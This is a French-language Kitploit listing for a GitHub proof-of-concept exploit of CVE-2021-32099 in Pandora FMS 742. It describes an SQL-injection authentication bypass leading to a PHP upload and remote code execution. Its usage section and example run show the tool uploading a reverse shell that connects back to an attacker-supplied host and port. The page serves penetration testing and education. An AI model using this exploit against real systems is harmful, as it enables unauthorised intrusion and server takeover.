Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-32099 — PoC for CVE-2021-32099 | Kitploit
Outils/GitHubGitHub/magicrc/cve-2021-32099
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmagicrc/cve-2021-32099

CVE-2021-32099

PoC for CVE-2021-32099

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2021-32099 PoC

Ce dépôt fournit un exploit Preuve de Concept (PoC) pour la vulnérabilité CVE-2021-32099, affectant Pandora FMS 742. L'exploit montre comment un attaquant non authentifié peut exploiter une vulnérabilité d'injection SQL pour élever une session non privilégiée en un compte de niveau administrateur. Avec un accès administrateur, l'attaquant peut télécharger un fichier PHP arbitraire via le gestionnaire de fichiers de Pandora FMS, entraînant une exécution de code à distance et compromettant le serveur en tant qu'utilisateur du serveur web.


⚠️ AVERTISSEMENT

Ce projet est destiné uniquement à des fins éducatives, de recherche et de tests de sécurité autorisés.
N'utilisez pas ce code sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite de tester.
L'auteur n'est pas responsable des dommages ou de toute utilisation abusive.


Installation

root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt

Utilisation

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py                                                           
usage: python3 ./CVE-2021-32099.py [--target TARGET] [--lhost LHOST] [--lport LPORT]

options:
  --target TARGET  Full URL of the vulnerable Pandora FMS instance.
  --lhost LHOST    IP address where the reverse shell will connect back to (must be reachable by the target). The listener will bind to 0.0.0.0 internally.
  --lport LPORT    Port number the reverse shell listener will bind to.

Example: python3 ./CVE-2021-32099.py --target http://target.com --lhost 10.10.14.157 --lport 4444

Exemple

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py --target http://localhost --lhost 10.10.14.81 --lport 4444
[+] Bypassing authentication...OK
[+] Uploading reverse shell...OK
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.129.177.29 on port 37308
[+] Executing reverse shell...
[*] Switching to interactive mode
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:59:07 up 17:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$  
Télécharger l’outil